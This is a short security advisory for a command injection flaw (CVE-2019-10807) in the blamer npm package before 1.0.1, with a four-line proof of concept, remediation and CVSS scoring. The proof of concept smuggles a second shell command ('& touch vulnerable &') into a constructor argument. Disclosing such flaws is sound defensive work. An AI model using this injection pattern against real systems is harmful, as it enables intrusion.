Command Injection

Affecting blamer package, versions <1.0.1

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

blamer is a tool for get information about author of code from version control system. Supports git and subversion.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the arguments provided to blamer.

PoC

var Root = require("blamer");
var attack_command = "& touch vulnerable &";
root = new Root('git',attack_command);
root.blameByFile("./");

Remediation

Upgrade blamer to version 1.0.1 or higher.

References

CVSS Score

5.9
medium severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    None
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C
Credit
JHU System Security Lab, mik317
CVE
CVE-2019-10807
CWE
CWE-78
Snyk ID
SNYK-JS-BLAMER-559541
Disclosed
09 Mar, 2020
Published
09 Mar, 2020